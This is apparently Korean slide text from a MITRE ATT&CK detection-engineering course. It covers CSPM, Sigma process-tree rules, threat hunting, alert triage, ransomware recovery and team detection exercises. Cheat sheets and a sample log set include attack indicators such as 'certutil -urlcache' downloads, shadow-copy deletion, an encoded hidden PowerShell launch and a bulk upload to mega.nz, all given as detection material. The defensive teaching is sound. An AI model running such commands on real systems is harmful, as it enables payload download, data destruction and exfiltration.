T1218·예외 조건·출력 필드를 함께 설계

CSPM과 ATT&CK: 클라우드 보안 포스처 관리

설정 오류가 공격 시작점 — CSPM으로 T1190·T1530·T1552 위험을 사전 차단

클라우드 보안 심화

클라우드 설정 오류 → ATT&CK 공격 연결

설정 오류	공격자 악용	ATT&CK
S3 버킷 공개 설정	민감 파일 무단 다운로드	T1530
과도한 IAM 권한	권한 상승 및 자원 악용	T1078.004
보안 그룹 0.0.0.0/0 허용	인터넷에서 직접 접근	T1190
CloudTrail 비활성화	탐지 우회, 활동 은폐	T1562.008
루트 계정 MFA 없음	계정 탈취 시 전체 제어	T1556
시크릿 평문 저장	자격증명 탈취	T1552.001

CSPM 도구와 ATT&CK 연계

AWS Security Hub: CIS AWS Foundation Benchmark → T1190 위험 항목 매핑
AWS Config Rules: 규정 미준수 리소스 탐지 + 자동 수정
Prisma Cloud / Wiz: 클라우드 전체 설정 오류를 ATT&CK Technique와 연결
Scout Suite (오픈소스): AWS/Azure/GCP 보안 감사

💡 Coverage 관점: CSPM이 발견한 설정 오류 = 공격자가 사용 가능한 Initial Access 경로. CSPM 점수 개선 = T1190·T1133 Coverage 강화와 동등한 효과

보강 설명 Cloud Security Posture Management(CSPM) 도구가 ATT&CK Coverage에 어떻게 기여하는지 설명합니다. 클라우드 설정 오류를 탐지하고 공격 면을 줄이는 방법을 다룹니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

T1190T1530T1552

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1190·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

📍 현재까지 225장 완료

마스터 과정

남은 75장에서 다룰 내용:
고급 실전 시나리오 · 탐지 엔지니어링 마스터 클래스
보안 운영 자동화 심화 · 최종 종합 참고 자료 · 마지막 정리

✅ 기본 과정 (82장) ✅ 심층 분석 (143장) 🔄 마스터 클래스 (75장 진행 중)

고급 탐지: 프로세스 트리 이상 패턴 자동화

부모-자식-손자 프로세스 관계에서 비정상 체인을 찾는 탐지 룰 설계

탐지 엔지니어링 마스터

비정상 부모-자식 패턴 카탈로그

부모 프로세스	의심 자식	ATT&CK
WINWORD.EXE / EXCEL.EXE	cmd.exe, powershell.exe, wscript.exe	T1566.001 + T1059
Adobe Reader / Acrobat	cmd.exe, powershell.exe	T1190 + T1059
Browser (chrome, firefox)	powershell.exe, cmd.exe	T1059 Drive-by
mshta.exe	powershell.exe, cscript.exe	T1218.005
svchost.exe	cmd.exe, powershell.exe (비표준)	T1055 Injection
spoolsv.exe	cmd.exe, net.exe	T1068 PrintNightmare
explorer.exe	psexec.exe, net.exe (원격에서)	T1021 Lateral

# 비정상 Office → Shell 체인 탐지 (Sigma) title: Office Application Spawning Shell logsource: category: process_creation product: windows detection: selection: ParentImage|endswith: - '\WINWORD.EXE' - '\EXCEL.EXE' - '\POWERPNT.EXE' Image|endswith: - '\cmd.exe' - '\powershell.exe' - '\wscript.exe' condition: selection level: high tags: - attack.initial_access - attack.t1566.001

보강 설명 프로세스 트리 분석을 자동화해 이상 체인을 자동으로 탐지하는 방법입니다. 부모-자식 프로세스 관계에서 비정상 패턴을 룰로 표현하는 기법을 다룹니다. 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

프로세스 트리 자동화부모-자식 관계비정상 체인

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
프로세스 트리 자동화·예외 조건·출력 필드를 함께 설계

네트워크 행동 분석(NBA): 패턴으로 ATT&CK 탐지

시그니처 없이 — 트래픽 패턴·볼륨·방향·타이밍으로 C2·Exfil·Lateral 탐지

탐지 엔지니어링 마스터

NBA 탐지 차원

볼륨 이상: 갑작스러운 아웃바운드 증가 (Exfiltration), 급격한 내부 스캔 (Discovery)
방향 이상: 서버→클라이언트 대용량 전송 (C2 결과 반환), 내부→내부 대규모 연결 (Lateral)
타이밍 이상: 야간 규칙적 통신 (Beaconing), 업무 외 시간 대용량 전송
프로토콜 이상: 비표준 포트 HTTPS, DNS 대용량 쿼리, ICMP 대용량 페이로드
대상 이상: 처음 보는 외부 IP·도메인, 내부에서 처음 통신하는 서버

East-West 트래픽 분석

North-South(인터넷↔내부) 외에 내부 간(East-West) 트래픽도 중요. Lateral Movement는 East-West 이상으로만 탐지 가능.

내부 IP → 내부 IP, 비정상 포트 (RDP/SMB to 비서버)
한 번도 통신 안 했던 내부 서버 간 연결 시작
Service Account가 워크스테이션에 SMB 연결

💡 도구: Zeek(구 Bro) + Elastic/Splunk로 NetFlow 분석 파이프라인 구축. Zeek는 패킷에서 자동으로 커넥션·DNS·HTTP 로그 생성

보강 설명 Network Behavior Analytics를 통해 ATT&CK Technique를 탐지하는 방법입니다. 단순 시그니처가 아닌 트래픽 패턴과 행동 분석으로 C2, Exfiltration, Lateral… 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

NBA네트워크 행동 분석트래픽 패턴

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

실전 케이스: 금융 APT 공격 전체 라이프사이클 재구성

Reconnaissance부터 Exfiltration까지 — 14개 Tactic을 모두 지나는 완전한 공격 체인

APT 라이프사이클

D-90

Recon

LinkedIn, OSINT

→

D-60

Res.Dev

C2 인프라 구축

→

D-0

Init Access

스피어피싱

→

D+1

Execution

PowerShell C2

→

D+2

Persist

예약 작업

→

D+3

Def.Eva

EDR 비활성화

D+5

Cred.Acc

Mimikatz

→

D+7

Discovery

내부 정찰

→

D+10

Lat.Mov

RDP·SMB

→

D+15

Collection

파일 수집

→

D+15

HTTPS Beacon

→

D+20

Exfil

클라우드 업로드

🚨 Dwell Time: 20일 — 처음 스피어피싱(D+0)부터 탐지(D+20)까지 20일. 이 기간 동안 도메인 관리자 자격증명 탈취 + 전체 금융 데이터 접근 + 외부 유출까지 완료됨

보강 설명국내 금융권을 타겟으로 한 실제형 APT 공격 시나리오를 완전히 재구성합니다. 정찰부터 최종 데이터 유출까지 전체 공격 라이프사이클을 ATT&CK으로 매핑합니다. 시간축과 로그 근거를 함께 묶어 설명하면 공격 체인의 맥락이 훨씬…

금융 APT공격 라이프사이클전체 재구성

시나리오 확장

금융 APT가 앞뒤 단계와 어떻게 이어지는지 정리
공격 라이프사이클를 시간축으로 놓고 체인으로 연결하기
공격자 목적과 피해 자산을 한 문장으로 설명

판단 포인트

정상 운영과 다른 기준 2~3개를 명확히 적기
계정·프로세스·네트워크 증거를 함께 교차 보기
차단 시점과 피해 최소화 지점을 구분해 보기

실무 적용

즉시 조치와 후속 조치를 나눠서 제안
보고 문장에는 ATT&CK ID와 영향 범위 포함
재발 방지를 위한 룰·정책 보완점까지 적기

탐지 룰 최적화 워크숍: 성능과 정확도를 동시에

느린 룰은 SIEM을 마비시킨다 — 검색 성능을 유지하면서 탐지 품질도 지키는 최적화 기법

탐지 최적화

느린 탐지 룰의 원인

와일드카드 남용: *evil* 같은 전체 스캔 필요 패턴
인덱스 미지정: 전체 인덱스 검색
시간 범위 과대: -7d 이상의 쿼리
하위 검색 중첩: 불필요한 subsearch
정규식 남용: regex 연산은 전수 스캔 필요

# 느린 쿼리 (개선 전) search CommandLine=*-enc* # 와일드카드 # 빠른 쿼리 (개선 후) index=sysmon EventCode=1 # 인덱스+EventCode 먼저 CommandLine|contains: "-enc " # contains가 REGEX보다 빠름 Image|endswith: '\powershell.exe'

룰 최적화 원칙 7가지

① 인덱스와 EventCode를 항상 먼저 지정 (인덱스 필터링 최우선)
② 와일드카드보다 contains·startswith·endswith 사용
③ 정규식(regex)은 최후 수단 — contains로 1차 필터 후 regex 적용
④ 시간 범위 최소화 — 실시간 탐지는 최근 5분으로 제한
⑤ 높은 cardinality 필드 먼저 필터 (IP, 사용자명)
⑥ 불필요한 필드 제거 — table 출력 필드 최소화
⑦ 결과셋 크기 예상 — stats 전에 where로 최대한 줄이기

보강 설명 기존에 작성한 탐지 룰을 성능 관점에서 최적화하는 워크숍입니다. 검색 속도 향상, 인덱스 활용, 룰 실행 비용 최소화 방법을 다룹니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

룰 최적화검색 성능인덱스 활용

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
룰 최적화를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

다중 Tactic 동시 발생 시 우선순위 결정 프레임워크

경보가 동시에 10개 뜨면? — ATT&CK 체인에서 어느 단계가 가장 위험한지 판단한다

복합 경보 처리

Tactic별 즉각 대응 우선순위

우선순위	상황	이유
P0 즉각	Impact (T1486 랜섬웨어, T1490 VSS 삭제)	되돌릴 수 없는 피해 진행 중
P0 즉각	Defense Evasion (T1562 보안 에이전트 중지)	이후 탐지 불가능 상태로 진입
P1 긴급	Credential Access (T1003 LSASS 덤프)	자격증명 탈취 → 수평 이동 임박
P1 긴급	Lateral Movement (DC 접근)	도메인 전체 위험 노출
P2 높음	Exfiltration (데이터 유출 진행 중)	피해 확대 중, 차단으로 최소화
P3 보통	Discovery, Persistence	즉각 피해 없음, 모니터링 강화
P4 낮음	Reconnaissance, Resource Dev	초기 단계, 추가 증거 수집 우선

동시 경보 처리 의사결정 흐름

1단계: 모든 경보를 Tactic으로 분류
2단계: Impact/Defense Evasion 있으면 → 즉각 격리 결정
3단계: 경보들 간 연관성 확인 → 같은 호스트/계정이면 하나의 체인
4단계: 체인의 현재 단계 파악 → 다음 단계 예측
5단계: 봉쇄 포인트 결정 → C2 차단 or 호스트 격리 or 계정 비활성화

핵심 원칙: 모든 경보를 순서대로 처리하면 반드시 중요한 것을 놓친다. Tactic 기반 위험도로 즉각 우선순위를 정해야 한다

보강 설명 여러 Tactic이 동시에 발생하는 복잡한 상황에서 우선순위를 결정하는 방법입니다. ATT&CK 공격 체인에서 어느 단계를 먼저 처리해야 피해를 최소화할 수 있는지 판단합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

다중 Tactic우선순위 결정Impact 최소화

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

자동화 헌팅: 스케줄된 헌팅 쿼리로 지속 감시

수동 헌팅의 한계 극복 — 핵심 가설을 자동화해 매일·매주 결과를 받는다

헌팅 자동화

자동화 헌팅 설계 패턴

일일 자동 헌팅: 전날 처음 등장한 신규 외부 도메인 + VT 점수 체크
주간 자동 헌팅: 이번 주 처음 실행된 바이너리 목록 (신규 프로세스)
월간 자동 헌팅: 장기 Beaconing 패턴 (30일 이상 동일 외부 통신)
이벤트 기반 헌팅: 새 IOC 수신 시 자동 소급 검색 트리거

# 일일 신규 도메인 헌팅 (Splunk Saved Search) index=dns earliest=-24h | stats min(_time) as first_seen count as query_count dc(src_ip) as unique_clients by query | lookup known_domains query OUTPUT category | where isnull(category) # 알려지지 않은 도메인 | lookup vt_lookup domain as query OUTPUT vt_score | where vt_score > 5 | sort -vt_score

자동화 결과 배포 설계

임계값 기반 경보: VT 점수 10 이상 → 즉각 경보 (실시간 대응)
일일 요약 이메일: 신규 도메인 목록 + VT 점수 팀 배포 (아침 9시)
주간 리포트: Coverage 변화 + 헌팅 발견 사항 + 개선 항목
월간 대시보드: KPI 추이 + ATT&CK Coverage 히트맵 업데이트

✅ 자동화 헌팅 효과:
분석가가 수동으로 매일 헌팅하지 않아도 핵심 가설은 자동으로 모니터링. 분석가는 결과 검토와 깊은 분석에 집중 가능

보강 설명 반복적인 헌팅 작업을 자동화하는 쿼리와 스케줄링 방법을 다룹니다. 주간 자동 헌팅 쿼리를 설정해 정기적으로 실행하고 결과를 팀에 배포하는 방법입니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

자동화 헌팅스케줄된 쿼리헌팅 자동화

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
자동화 헌팅·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

랜섬웨어 복구 계획: ATT&CK 기반 안전 복구

성급한 복구는 재감염으로 이어진다 — Persistence 완전 제거 확인 후 단계적 복구

랜섬웨어 복구

격리 유지 + 증거 보존

감염 시스템 네트워크 격리 유지. 메모리 덤프 + 포렌식 이미지 수집. 법집행 신고 검토

공격 체인 완전 재구성

ATT&CK 매핑으로 초기 침투 경로 파악. 아직 발견되지 않은 감염 시스템 없는지 확인

Persistence 전수 제거 확인

T1053 예약작업 · T1547 레지스트리 · T1505 웹쉘 · T1136 백도어 계정 · T1543 서비스 전수 점검

초기 침투 벡터 차단

VPN 취약점 패치 / 피싱 경로 차단 / 탈취된 자격증명 모두 변경 후 복구 시작

단계적 복구 + 모니터링 강화

중요도 높은 시스템 먼저 복구. 복구 후 24~72시간 집중 모니터링. 재감염 징후 즉각 탐지

Persistence 제거 체크리스트

☐ 전체 예약 작업 전수 조사 (schtasks /query)
☐ Run/RunOnce 레지스트리 키 전수 확인
☐ 모든 서비스 목록 검토 (비정상 서비스 제거)
☐ 웹 서버 디렉토리 웹쉘 스캔
☐ 신규 계정 및 관리자 그룹 멤버 확인
☐ SSH Authorized Keys 확인 (Linux)
☐ krbtgt 비밀번호 2회 변경 (AD 환경)
☐ EDR/보안 에이전트 재설치 및 정책 확인

보강 설명 랜섬웨어 공격 후 복구 계획을 ATT&CK과 연계합니다. 복구 우선순위, Persistence 제거 확인, 재감염 방지를 위한 체계적 접근을 다룹니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

랜섬웨어 복구Persistence 제거재감염 방지

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

클라우드 Serverless 환경 ATT&CK 적용

EDR 없는 Lambda·Functions 환경 — 클라우드 감사 로그와 코드 분석이 유일한 탐지 수단

서버리스 보안

Serverless 환경 주요 공격 패턴

T1648 Serverless Execution: 악성 코드를 Lambda Function으로 실행 (C2, 크립토마이닝)
T1078.004 권한 있는 함수 탈취: 높은 IAM 권한을 가진 기존 Lambda 함수 악용
T1552.007 환경 변수 시크릿: Lambda 환경 변수에서 DB 자격증명, API 키 추출
T1190 Function URL 인젝션: Function URL의 입력 파라미터 인젝션 공격

Serverless 탐지 전략

CloudTrail: Lambda 함수 생성·수정·실행 이벤트 감사
Lambda 로그 (CloudWatch): 실행 시간, 에러, 외부 통신 패턴
IAM 모니터링: 함수 실행 역할(Role)의 비정상 API 호출
코드 분석: 신규 Function 배포 시 정적 코드 분석 자동화
비정상 실행 패턴: 예상 외 시간·빈도·런타임 초과

💡 Lambda 탐지 쿼리 아이디어:
CloudTrail에서 Lambda 함수가 평소 호출하지 않던 외부 도메인으로 아웃바운드 연결 시도 → 코드 인젝션 또는 권한 남용 가능성

보강 설명 Lambda/Azure Functions 같은 서버리스 환경에서의 공격 패턴을 다룹니다. 기존 EDR이 없는 서버리스 환경에서 ATT&CK 탐지를 어떻게 적용하는지 설명합니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

T1648Serverless 공격Lambda

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1648·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

심화 실습: IOC 연관 분석 맵 작성 (15분)

주어진 IOC 10개를 서로 연결해 공격 인프라 연관 맵을 완성하라

IOC 연관 분석

연관 분석 대상 IOC 세트

IOC 유형	값	출처
C2 IP	185.220.101.78	EDR 네트워크 로그
C2 도메인	update-cdn-api.net	DNS 로그
피싱 도메인	secure-corp-docs.com	메일GW 로그
악성 파일 해시	SHA256: 4a5b6c...	EDR 파일 탐지
백도어 계정	svc_helper01	AD 감사 로그
감염 호스트	10.0.0.88 (WKST-05)	EDR 경보
감염 호스트 2	10.0.0.120 (SVRS-03)	Lateral Move
외부 업로드 대상	dropbox.com/upload	Proxy 로그
레지스트리 키	HKCU\...\Run\Update	Sysmon 13
C2 인증서 지문	JA3: 769,47-53-5,...	TLS 분석

연관 분석 과제

① 각 IOC를 노드로, 연관 관계를 엣지로 표현하는 맵 스케치
② IP와 도메인의 연관 관계 (같은 인프라?)
③ 감염 호스트 간 이동 경로 표시
④ 피싱 → 감염 → C2 → 유출 체인 연결
⑤ PassiveDNS/VT로 추가 연관 IOC 식별 방법 제안

💡 연관 분석 도구:
Maltego (GUI 그래프) · CyberChef (인코딩 분석) · VirusTotal Graph · Shodan (인프라 연관) · Hurricane Electric BGP 툴킷 (IP 인프라)

보강 설명 하나의 사고에서 수집된 IOC들을 서로 연결하는 연관 분석 맵을 작성하는 실습입니다. IP, 도메인, 해시, 계정, 호스트를 그래프로 연결해 공격 인프라 전체를 시각화합니다. 근거 로그와 다음 행동까지 붙여 적으면 실무 발표와 문서화가 쉬워집니다.

IOC 연관 분석연결 맵공격 인프라

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
IOC 연관 분석를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

최종 평가 2: 전문가 수준 분석 보고서 작성 (40분)

주어진 사고 로그를 분석해 기술 보고서 + 경영진 요약 + 개선 권고를 완성하라

최종 평가

사고 개요 (제공 데이터)

국내 제조업체 C사에서 다음 이상 징후가 발생했습니다:

주요 ERP 서버에서 새벽 2시 암호화 시작 경보
직전 EDR: lsass.exe 메모리 접근, 보안 에이전트 중지
3일 전: 엔지니어 PC에서 Excel 매크로 실행 이력
1주일 전: IT팀 VPN 계정 해외 IP 로그인 (이상 없다고 판단됨)
당일 새벽: 파일 서버 대용량 복사 후 외부 전송

보고서 요구사항 (100점)

공격 타임라인 재구성 (25점): 1주 전부터 당일까지 ATT&CK 체인 완성
Dwell Time 계산 (10점): 공격 시작 ~ 탐지 시간 계산 + 놓친 탐지 기회
근본 원인 분석 (20점): 왜 이 침해가 가능했는가 (3가지)
경영진 보고 문서 (20점): 비즈니스 언어로 1페이지, ATT&CK 없이
재발 방지 로드맵 (25점): 단기/중기/장기 구체적 개선 계획

⏱️ 40분 개인 작업 → 5분 발표 → 3분 Q&A

보강 설명두 번째 최종 평가입니다. 실제 사고 로그를 분석하고 전문가 수준의 분석 보고서를 작성합니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

최종 보고서 평가기술 분석경영진 보고

설명 확장

최종 보고서 평가 기준으로 첫 단서를 먼저 분류하기
기술 분석를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

ATT&CK 기반 보안 운영 One-Page 총정리

모듈 전체의 핵심을 한 장에 — 실무에서 즉각 참조 가능한 최종 요약

총정리

 매핑 핵심
Tactic = 목적(왜), Technique = 방법(어떻게)
매핑 = 근거 + Confidence 함께
H = 멀티시그널 | M = 단일 센서 | L = 추정
공격은 체인 — 단일 이벤트가 아님
맥락(시간·위치·행동)이 해석 결정


 탐지 핵심
Data Source → Component → 쿼리 순서
Coverage 0~3 점수로 관리
룰 = Technique를 운영 조건으로 번역
오탐 주간 TOP 10 반드시 튜닝
Sigma로 작성 → 플랫폼 자동 변환


 헌팅 핵심
가설 → 탐색 → 발견/미발견 → 개선
미발견도 Coverage 정보
월간 캠페인으로 정례화
Long Tail 분석 + 피벗 확장
플레이북 문서화 필수


 경보 처리
P0: Impact · Defense Evasion 즉각
P1: Credential Access · Lateral Move
5W1H 분석 → ATT&CK 매핑 → 액션
격리 전 증거 보존 먼저
타임라인 + 티켓 기록 동시 시작


 보고 핵심
30초 = 시작 → 진행 → 영향 → 액션
경영진에게 ATT&CK ID 사용 금지
근거 없는 단정 금지 · Confidence 표기
아직 모르는 것도 명확히 표기
다음 액션은 반드시 구체적으로


 운영 핵심
Coverage 분기별 업데이트
Purple Team 분기 또는 반기
ATT&CK 분기 업데이트 반영
KPI = Coverage 3점 비율 + MTTD
루틴: 일 태그 · 주 튜닝 · 월 헌팅

보강 설명 ATT&CK 기반 보안 운영의 모든 핵심을 한 페이지로 압축한 최종 정리입니다. 이 슬라이드를 벽에 붙여두면 실무에서 즉각 참조할 수 있습니다. 대표 예시와 연결해 기억하면 이해가 더 오래 남습니다.

One-Page 정리핵심 압축실무 참조

이해 포인트

One-Page 정리를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

치트시트 8: 경보 유형별 즉각 연상 카드

이 경보가 오면 즉각 이것을 확인 — 분석 속도를 높이는 빠른 참조

치트시트

경보/로그 패턴	즉각 연상 Technique	다음 확인 사항
Office.exe → cmd.exe/ps.exe	T1566.001 + T1059	Base64 디코딩 · 아웃바운드
짧은 시간 대량 4625 실패	T1110	성공 이벤트 여부 · 계정 패턴
vssadmin delete shadows	T1490	파일 암호화 시작 여부 즉시
lsass.exe ProcessAccess (10)	T1003.001	Source 프로세스 · GrantedAccess
WinEvent 5001 (Defender 중지)	T1562.001	중지 전후 프로세스 · 격리 검토
WinEvent 4698 야간 등록	T1053.005	실행 경로 · 사용자 · 반복 트리거
HTTP 주기 POST + 크기 일정	T1071.001	도메인 나이·VT · 호스트 프로세스
서버 → 외부 대용량 업로드	T1567 / T1041	파일 종류 · 이전 Collection 흔적

경보/로그 패턴	즉각 연상 Technique	다음 확인 사항
4769 RC4 + 비DC SPN 요청 다수	T1558.003	서비스 계정 비밀번호 강도
RDP 연쇄 A→B→C 이동	T1021.001	출발·도착 계정 · 실행 명령
net group "Domain Admins"	T1069.002	직전 프로세스 · 계정 권한
WinEvent 1102 보안로그 삭제	T1070.001	삭제 전 이벤트 소급 · 즉각 P1
certutil -urlcache -f http://	T1218 + T1105	다운로드 URL · 이후 실행 여부
SQLi 패턴 + 200 응답	T1190	서버 프로세스 이상 · 웹쉘 확인
DGA 유사 도메인 DNS 쿼리	T1568	엔트로피 계산 · 연속 쿼리 패턴
해외 IP VPN 로그인 (처음)	T1078 + T1133	Impossible Travel · 이후 행동

보강 설명 가장 자주 보는 경보에서 즉각 연상해야 할 ATT&CK Technique와 다음 확인 사항을 한 카드에 담았습니다. 경보 처리 속도를 높이는 빠른 참조… 대표 예시와 로그를 묶어 보면 이해가 빨라집니다.

탐지 가속즉각 연상경보 빠른 처리

이해 포인트

탐지 가속를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기

사이버 사고 공시·신고 절차: ATT&CK 분석 결과 활용

사고 후 72시간 — ATT&CK 매핑 결과가 신고서 내용의 핵심 근거가 된다

규제 대응

국내 주요 신고 채널

신고 채널	대상	기한
KISA 인터넷침해대응센터	모든 사이버 침해 사고	즉시 (118)
개인정보보호위원회	개인정보 유출 사고	72시간 내
금융보안원	금융회사 사이버 사고	즉시
방송통신위원회	통신사업자 사고	24시간 내
주요정보통신기반시설	기반시설 운영자	즉시

ATT&CK이 신고서에 기여하는 부분

침해 경위: ATT&CK 공격 체인으로 공격자 행위 체계적 설명
피해 범위: Collection/Exfiltration Technique 근거로 유출 데이터 특정
발생 시점: 소급 탐지로 실제 공격 시작 시점 특정
재발 방지: Coverage 공백 기반 구체적 개선 계획 제시
기술적 조치: Persistence 제거 체크리스트 이행 증빙

⚠️ 법무팀 필수 협력: 신고 내용은 법적 책임에 영향. 반드시 법무팀과 함께 작성. ATT&CK 분석가는 기술 사실만 제공, 법적 판단은 법무팀에 위임

보강 설명사이버 사고 발생 시 국내외 보안 공시 및 규제 기관 신고 절차를 다룹니다. ATT&CK 분석 결과가 신고서 작성에 어떻게 활용되는지 설명합니다. 시간축과 로그 근거를 함께 묶어 설명하면 공격 체인의 맥락이 훨씬 선명해집니다.

보안 공시개인정보 유출 신고KISA 신고

시나리오 확장

보안 공시가 앞뒤 단계와 어떻게 이어지는지 정리
개인정보 유출 신고를 시간축으로 놓고 체인으로 연결하기
공격자 목적과 피해 자산을 한 문장으로 설명

판단 포인트

정상 운영과 다른 기준 2~3개를 명확히 적기
계정·프로세스·네트워크 증거를 함께 교차 보기
차단 시점과 피해 최소화 지점을 구분해 보기

실무 적용

즉시 조치와 후속 조치를 나눠서 제안
보고 문장에는 ATT&CK ID와 영향 범위 포함
재발 방지를 위한 룰·정책 보완점까지 적기

팀 탐지 챌린지: 누가 더 많이, 더 정확하게?

동일 로그 세트 → 각 팀이 독립 분석 → 가장 완전한 체인을 구성한 팀 우승

경쟁적 탐지 챌린지

# 챌린지 로그 세트 (20분 분석) ━━ 메일GW (11/28 09:11) ━━ FROM: hr-dept@emp-portal.xyz (DKIM:FAIL) SUBJ: 2024 연봉협상 결과_개인.xlsm ━━ EDR (09:23) ━━ EXCEL.EXE → wscript.exe → powershell.exe -w hidden -NonI -Enc SQBFAFgAIA... ━━ DNS (09:24) ━━ QUERY: cdn3-update.xyz Age:6days VT:22/94 ━━ FW (09:25~14:30) ━━ ALLOW 10.0.1.44→185.107.56.3:443 75s±4s ━━ WinEvent (11:02) ━━ 4769 TicketEncryptionType=0x17 ServiceName=MSSQLSvc/SQLSVR-01 × 8건 in 3min Client=10.0.1.44 ━━ File Audit (13:15) ━━ \\SQLSVR-01\Data\Customer_DB.bak COPIED User: sa Size: 12.4GB ━━ Proxy (13:55) ━━ PUT https://mega.nz/upload/db_backup.zip 12.1GB

채점 기준 (팀당 60점)

정확한 Technique 매핑: Technique당 3점
Sub-technique 명시: 추가 1점/개
올바른 시간 순서: 5점
탐지 공백 식별: 공백 1개당 2점
30초 보고 완성도: 10점
즉각 대응 권고 (3가지): 6점

팁: Technique를 많이 찾는 것도 중요하지만, 연결 논리(왜 이 순서인가?)를 설명할 수 있어야 만점

보강 설명 팀 대항 탐지 챌린지입니다. 동일한 로그 세트를 주고, 누가 더 많은 Technique를 정확하게 탐지하고 체인을 완성하는지 경쟁합니다. 실제 SOC 경쟁 환경을 체험합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

탐지 챌린지팀 경쟁동일 로그

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
탐지 챌린지를 고를 때 대체 설명도 함께 적기
